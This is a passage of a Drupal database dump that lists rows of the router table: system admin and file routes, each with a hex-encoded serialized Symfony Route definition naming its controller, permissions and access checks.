0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32353a222f61646d696e2f7265706f7274732f7374617475732f706870223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a35313a225c44727570616c5c73797374656d5c436f6e74726f6c6c65725c53797374656d496e666f436f6e74726f6c6c65723a3a706870223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32393a2261646d696e6973746572207369746520636f6e66696775726174696f6e223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a303b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33323a227b5e2f61646d696e2f7265706f7274732f7374617475732f706870247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32353a222f61646d696e2f7265706f7274732f7374617475732f706870223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a32353a222f61646d696e2f7265706f7274732f7374617475732f706870223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('system.prepare_modules_entity_uninstall', '/admin/modules/uninstall/entity/{entity_type_id}', '/admin/modules/uninstall/entity/%', 30, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34383a222f61646d696e2f6d6f64756c65732f756e696e7374616c6c2f656e746974792f7b656e746974795f747970655f69647d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35333a225c44727570616c5c73797374656d5c466f726d5c507265706172654d6f64756c6573456e74697479556e696e7374616c6c466f726d223b733a31353a225f7469746c655f63616c6c6261636b223b733a36343a225c44727570616c5c73797374656d5c466f726d5c507265706172654d6f64756c6573456e74697479556e696e7374616c6c466f726d3a3a666f726d5469746c65223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a31383a2261646d696e6973746572206d6f64756c6573223b733a31343a225f637573746f6d5f616363657373223b733a36363a225c44727570616c5c73797374656d5c466f726d5c507265706172654d6f64756c6573456e74697479556e696e7374616c6c466f726d3a3a636865636b416363657373223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b693a313b733a31393a226163636573735f636865636b2e637573746f6d223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31343a22656e746974795f747970655f6964223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36353a227b5e2f61646d696e2f6d6f64756c65732f756e696e7374616c6c2f656e746974792f283f503c656e746974795f747970655f69643e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31343a22656e746974795f747970655f6964223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f6d6f64756c65732f756e696e7374616c6c2f656e74697479223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31343a22656e746974795f747970655f6964223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a33303b733a31343a227061747465726e4f75746c696e65223b733a33333a222f61646d696e2f6d6f64756c65732f756e696e7374616c6c2f656e746974792f25223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('system.private_file_download', '/system/files/{filepath}', '/system/files/%', 6, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32343a222f73797374656d2f66696c65732f7b66696c65706174687d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a34373a225c44727570616c5c73797374656d5c46696c65446f776e6c6f6164436f6e74726f6c6c65723a3a646f776e6c6f6164223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a383a2266696c6570617468223b733a323a222e2b223b733a373a225f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a333a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32303a226163636573735f636865636b2e64656661756c74223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a383a2266696c6570617468223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33373a227b5e2f73797374656d2f66696c65732f283f503c66696c65706174683e2e2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a323a222e2b223b693a333b733a383a2266696c6570617468223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f73797374656d2f66696c6573223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a383a2266696c6570617468223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a363b733a31343a227061747465726e4f75746c696e65223b733a31353a222f73797374656d2f66696c65732f25223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('system.regional_settings', '/admin/config/regional/settings', '/admin/config/regional/settings', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33313a222f61646d696e2f636f6e6669672f726567696f6e616c2f73657474696e6773223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33323a225c44727570616c5c73797374656d5c466f726d5c526567696f6e616c466f726d223b733a363a225f7469746c65223b733a31373a22526567696f6e616c2073657474696e6773223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32393a2261646d696e6973746572207369746520636f6e66696775726174696f6e223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33383a227b5e2f61646d696e2f636f6e6669672f726567696f6e616c2f73657474696e6773247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33313a222f61646d696e2f636f6e6669672f726567696f6e616c2f73657474696e6773223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33313a222f61646d696e2f636f6e6669672f726567696f6e616c2f73657474696e6773223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('system.rss_feeds_settings', '/admin/config/services/rss-publishing', '/admin/config/services/rss-publishing', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33373a222f61646d696e2f636f6e6669672f73657276696365732f7273732d7075626c697368696e67223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33323a225c44727570616c5c73797374656d5c466f726d5c5273734665656473466f726d223b733a363a225f7469746c65223b733a31343a22525353207075626c697368696e67223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32393a2261646d696e6973746572207369746520636f6e66696775726174696f6e223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34353a227b5e2f61646d696e2f636f6e6669672f73657276696365732f7273735c2d7075626c697368696e67247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33373a222f61646d696e2f636f6e6669672f73657276696365732f7273732d7075626c697368696e67223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33373a222f61646d696e2f636f6e6669672f73657276696365732f7273732d7075626c697368696e67223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('system.run_cron', '/admin/reports/status/run-cron', '/admin/reports/status/run-cron', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33303a222f61646d696e2f7265706f7274732f7374617475732f72756e2d63726f6e223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a34323a225c44727570616c5c73797374656d5c43726f6e436f6e74726f6c6c65723a3a72756e4d616e75616c6c79223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a32393a2261646d696e6973746572207369746520636f6e66696775726174696f6e223b733a31313a225f637372665f746f6b656e223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a383a226e6f5f6361636865223b623a313b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b693a313b733a31373a226163636573735f636865636b2e63737266223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33383a227b5e2f61646d696e2f7265706f7274732f7374617475732f72756e5c2d63726f6e247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33303a222f61646d696e2f7265706f7274732f7374617475732f72756e2d63726f6e223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33303a222f61646d696e2f7265706f7274732f7374617475732f72756e2d63726f6e223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('system.site_information_settings', '/admin/config/system/site-information', '/admin/config/system/site-information', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33373a222f61646d696e2f636f6e6669672f73797374656d2f736974652d696e666f726d6174696f6e223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33393a225c44727570616c5c73797374656d5c466f726d5c53697465496e666f726d6174696f6e466f726d223b733a363a225f7469746c65223b733a31393a22426173696320736974652073657474696e6773223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32393a2261646d696e6973746572207369746520636f6e66696775726174696f6e223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34353a227b5e2f61646d696e2f636f6e6669672f73797374656d2f736974655c2d696e666f726d6174696f6e247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33373a222f61646d696e2f636f6e6669672f73797374656d2f736974652d696e666f726d6174696f6e223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33373a222f61646d696e2f636f6e6669672f73797374656d2f736974652d696e666f726d6174696f6e223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('system.site_maintenance_mode', '/admin/config/development/maintenance', '/admin/config/development/maintenance', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33373a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f6d61696e74656e616e6365223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a34333a225c44727570616c5c73797374656d5c466f726d5c536974654d61696e74656e616e63654d6f6465466f726d223b733a363a225f7469746c65223b733a31363a224d61696e74656e616e6365206d6f6465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a35373a2261646d696e6973746572207369746520636f6e66696775726174696f6e2b61646d696e697374657220736f6674776172652075706461746573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34343a227b5e2f61646d696e2f636f6e6669672f646576656c6f706d656e742f6d61696e74656e616e6365247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33373a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f6d61696e74656e616e6365223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33373a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f6d61696e74656e616e6365223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('system.status', '/admin/reports/status', '/admin/reports/status', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32313a222f61646d696e2f7265706f7274732f737461747573223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a35343a225c44727570616c5c73797374656d5c436f6e74726f6c6c65725c53797374656d496e666f436f6e74726f6c6c65723a3a737461747573223b733a363a225f7469746c65223b733a31333a22537461747573207265706f7274223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32393a2261646d696e6973746572207369746520636f6e66696775726174696f6e223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32383a227b5e2f61646d696e2f7265706f7274732f737461747573247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32313a222f61646d696e2f7265706f7274732f737461747573223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32313a222f61646d696e2f7265706f7274732f737461747573223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('system.temporary', '/system/temporary', '/system/temporary', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31373a222f73797374656d2f74656d706f72617279223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a34373a225c44727570616c5c73797374656d5c46696c65446f776e6c6f6164436f6e74726f6c6c65723a3a646f776e6c6f6164223b733a363a22736368656d65223b733a393a2274656d706f72617279223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a373a225f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a333a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32303a226163636573735f636865636b2e64656661756c74223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32343a227b5e2f73797374656d2f74656d706f72617279247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31373a222f73797374656d2f74656d706f72617279223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a31373a222f73797374656d2f74656d706f72617279223b733a383a226e756d5061727473223b693a323b7d7d, 2),
('system.themes_page', '/admin/appearance', '/admin/appearance', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31373a222f61646d696e2f617070656172616e6365223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a363a225f7469746c65223b733a31303a22417070656172616e6365223b733a31313a225f636f6e74726f6c6c6572223b733a35343a225c44727570616c5c73797374656d5c436f6e74726f6c6c65725c53797374656d436f6e74726f6c6c65723a3a7468656d657350616765223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31373a2261646d696e6973746572207468656d6573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32343a227b5e2f61646d696e2f617070656172616e6365247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31373a222f61646d696e2f617070656172616e6365223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a31373a222f61646d696e2f617070656172616e6365223b733a383a226e756d5061727473223b693a323b7d7d, 2),
('system.theme_install', '/admin/appearance/install', '/admin/appearance/install', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32353a222f61646d696e2f617070656172616e63652f696e7374616c6c223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a35303a225c44727570616c5c73797374656d5c436f6e74726f6c6c65725c5468656d65436f6e74726f6c6c65723a3a696e7374616c6c223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a31373a2261646d696e6973746572207468656d6573223b733a31313a225f637372665f746f6b656e223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b693a313b733a31373a226163636573735f636865636b2e63737266223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33323a227b5e2f61646d696e2f617070656172616e63652f696e7374616c6c247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32353a222f61646d696e2f617070656172616e63652f696e7374616c6c223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32353a222f61646d696e2f617070656172616e63652f696e7374616c6c223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('system.theme_settings', '/admin/appearance/settings', '/admin/appearance/settings', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32363a222f61646d696e2f617070656172616e63652f73657474696e6773223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33373a225c44727570616c5c73797374656d5c466f726d5c5468656d6553657474696e6773466f726d223b733a363a225f7469746c65223b733a31393a22417070656172616e63652073657474696e6773223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a31373a2261646d696e6973746572207468656d6573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33333a227b5e2f61646d696e2f617070656172616e63652f73657474696e6773247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32363a222f61646d696e2f617070656172616e63652f73657474696e6773223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32363a222f61646d696e2f617070656172616e63652f73657474696e6773223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('system.theme_settings_theme', '/admin/appearance/settings/{theme}', '/admin/appearance/settings/%', 14, 